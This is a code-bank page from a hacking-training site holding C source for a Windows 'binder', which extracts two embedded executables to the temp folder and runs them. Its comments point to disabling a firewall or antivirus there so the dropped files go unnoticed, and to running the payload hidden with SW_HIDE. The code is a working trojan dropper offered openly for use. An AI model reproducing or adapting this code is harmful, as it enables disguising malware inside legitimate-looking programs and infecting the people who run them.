EG Information

Main Index
EG Manual
Disclaimer
Legal Information
Hall of Fame
Hall of Shame
Member Rankings
Members List
Meet the Staff

Training Missions

Read Me First New
Basic Skills
Realistic Scenarios
Cryptography
Software Cracking
Linux ELF Binary Cracking
Logical Thinking
Programming
Patching
Steganography
Deface This Wall
/dev/null
/dev/urandom

Knowledge Bank

Discussion Forums
Enigma Chat New
RSS Feeds RSS
Articles / Tutorials
Videos
Online EG MP3 Player Radio
Enigma Zine
Downloads
Tools New

Code Resources

Submit Code
Ajax
ASM
Bash
C
CPP
Csharp
Delphi
Haskell
Java
Javascript
Jython
Lisp
mIRC
MySQL
Perl
PHP
Python
QBASIC
VisualBasic

Hakipedia: An open collaborative for all your information security needs.

The Urinal

Click Here To Vote For EG!

Has Enigma Group Helped You? Then Help Us By Advertising For Us. Place One Of The Following Images On Your Site.

enigma group

enigma group

enigma group

enigma group

Enigma Group's Code Bank


A binder

By: mofm  -  Date Submitted: 2009-07-25 17:41:09

  1. #include <windows.h>
  2. #include <stdlib.h>
  3. #include "resource.h"
  4. #include "stdafx.h"
  5. /* define for microsoft compiler */
  6.  
  7. #define WIN32_LEAN_AND_MEAN
  8.  
  9. /* The Following 2 lines are the only 2 lines you have to do anything to! */
  10. char File1Extention[] = "exe"; /* <--- Change to proper file extention!!! */
  11. char File2Extention[] = "exe"; /* <--- Change to proper file extention!!! */
  12.  
  13. /* Global Variables */
  14.  
  15. HINSTANCE hInst;
  16.  
  17. /* Declare functions we're gonna use. */
  18.  
  19. void ExtractFile (unsigned short);
  20. void RandomString(char *);
  21.  
  22. int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
  23. {
  24. 	/* OK.. it all starts here */
  25. 	PeekMessage(0,0,0,0,0); /* Get rid of thinking pointer */ 
  26. 	hInst = hInstance; /* we need this later  */
  27.  
  28. 	/* A hacker may use this part to disable a firewall or antivirus */
  29. 	/* program so the files they extract arent detected. */
  30.  
  31. 	ExtractFile(TDFILE1); /* extract first file  */
  32. 	ExtractFile(TDFILE2); /* extract second file */
  33. 	return FALSE; /*  End of our program! */
  34. }
  35.  
  36. /*
  37. 	Extract File Function
  38. 	I guess this is the main function.  It extracts the resource file to the temp dir...
  39. 	with a random name and the proper extention, and then executes it (or opens it).
  40. 	if you dont wanna execute em both.. then I reccomend that in this function you do a..
  41. 	i f (whichone == TDFILE1){ <execute or not exetute>; } ya know what I mean?
  42. */
  43.  
  44. void ExtractFile (unsigned short whichone)
  45. {
  46. 	/* declare local variables */
  47.  
  48. 	char tempfilename[13],TempDirBuff[MAX_PATH + 1],*ResourcePointer;
  49. 	unsigned long TempDirLen,ResourceSize,byteswritten;
  50. 	HRSRC ResourceLocation;
  51. 	HGLOBAL ResDataHandle;
  52. 	HANDLE FileHandle;
  53.  
  54. 	/* Get Random String for file name */
  55. 	if (whichone == TDFILE1)
  56. 	{
  57. 		strcpy (tempfilename , "socket123");
  58. 	}else{
  59.  
  60. RandomString(tempfilename);
  61. 	}
  62. 	/* Next we get the Temp Dir */
  63. 	TempDirLen = GetTempPath(MAX_PATH + 1,TempDirBuff);
  64. 	/* now is where we make the full path so first we copy the file random file name after the temp dir path*/
  65. 	strncpy(&TempDirBuff[TempDirLen],tempfilename,9);
  66. 	/*next we add the period after the random file name*/
  67. 	TempDirBuff[TempDirLen + 9] = '.';
  68. 	/* now check to see which extention we're using  and copy it + it's null terminator to the TempDirBuff */
  69. 	if (whichone == TDFILE1)
  70. 	{
  71. 		strncpy(&TempDirBuff[TempDirLen + 10],File1Extention,(strlen(File1Extention) + 1));
  72. 	}
  73. 	else
  74. 	{
  75. 		strncpy(&TempDirBuff[TempDirLen + 10],File2Extention,(strlen(File2Extention) + 1));
  76. 	}
  77.  
  78. 	/* Now we got the path we're gonna copy it to! */
  79. 	/* Now we get the location of our resource...  */
  80.  
  81. 	ResourceLocation = FindResource(hInst,(const char *)whichone,RT_RCDATA);
  82. 	if (ResourceLocation == 0) { return; }
  83.  
  84. 	/*Now get the size of the resource*/
  85.  
  86. 	ResourceSize = SizeofResource(hInst,ResourceLocation);
  87. 	if (ResourceSize == 0) { return; }
  88.  
  89. 	/*Now load it into global memory*/
  90.  
  91. 	ResDataHandle = LoadResource(hInst,ResourceLocation);
  92. 	if (ResDataHandle == 0) { return; }
  93.  
  94. 	/*Lock the Resource into memory and get a pointer to it!*/
  95.  
  96. 	ResourcePointer = (char *)LockResource(ResDataHandle);
  97. 	if (ResourcePointer == 0) { return; }
  98.  
  99. 	/* Now we create the file. */
  100.  
  101. 	FileHandle = CreateFile(TempDirBuff,GENERIC_WRITE,FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
  102. 	if (FileHandle == INVALID_HANDLE_VALUE) { return; }
  103.  
  104. 	/* Now We Write to the file */
  105.  
  106. 	WriteFile(FileHandle,ResourcePointer,ResourceSize,&byteswritten,0);
  107.  
  108. 	/* Now Close the file */
  109.  
  110. 	CloseHandle(FileHandle);
  111.  
  112. 	/* Now Open/Execute the file */
  113. 	/* I used SW_SHOW as the show paremeter, if you want it to run invisibly, try SW_HIDE */
  114.  
  115. 	ShellExecute(NULL,NULL,TempDirBuff,NULL,NULL,SW_SHOW);
  116.  
  117. 	return;
  118. }
  119.  
  120.  
  121. /*
  122. 	Random String Function
  123. 	I'm sure this random string function could be better, 
  124. 	but frankly.. I dont care, cuz it works fine.
  125. */
  126.  
  127. void RandomString(char *RandomStr)
  128. {
  129. 	int i;
  130. 	srand( (unsigned)GetTickCount() );
  131. 	i=0;
  132. 	ZeroMemory(RandomStr,9);
  133. 	while(i < 9)
  134. 	{
  135. 		RandomStr[i] = rand();
  136. 		while (RandomStr[i] > 25)	{	RandomStr[i] -= 26;	}
  137. 		while (RandomStr[i] < 0)	{	RandomStr[i] += 26;	}
  138. 		RandomStr[i] += 97;
  139. 		i++;
  140. 	}
  141. 	RandomStr[9] = '';
  142. 	return;
  143. }
  144.  
Comments [0]
Return to c category list

Who's Online

484 Guests, 101 Users
ckryptix, Ios, viper0i0, Diznablo, rabbidmind, asapong, Nasrudin, CollapsingWalls, mehtaparag, bitstrike, jnony, C, Nicid1, Nusquam-Redono-Sapientia, bazcrown, saifulfaizan, The End, Ultraminor, psychomarine, st3alth, themastersinner, pgmrlink, login, lionaneesh, ishkur88, mahraja, Mac, chekifr, gandalf88, Vap0r, t0ast, tantrum6226, BnE, Distorted, Psiber_Syn, Ausome1, invas10n, oldgoat, freedaysbecumei, BinaryShinigami, Rex_Mundi, Red_beard, Strobeflux, s0m3nak3dguy, Descent, teehee, machupicchu, Genetix, Anandarl, NotMyOwn, thegamerdude, Godzila, popo12341234, RedEvolution, velocity_b, myne17, teto111, aVoid, Central-Gsm, 1101, JackalReborn, InjectioN, h4lted, c0re, DisPater, markt4death, splatta, Jackowacko, saint556, Pyron2312, Azerion, howsens, white.hat.gone.bad, vazzilly, pwunkz, Inverted, QuarterCask, Infernoe11, deskata, cr4ck3rj4ck, Blizer, jasonmax, j0sh, gwenwavor, N4g4c3N, spizeyboy, Network X, Uino59, Jae Cee, ianFDK, saykov, medhaavee, zofy, demonkiller410, Stumble, SaMTHG, kishore, Raze, helasraizam, Venom1019, Jakabo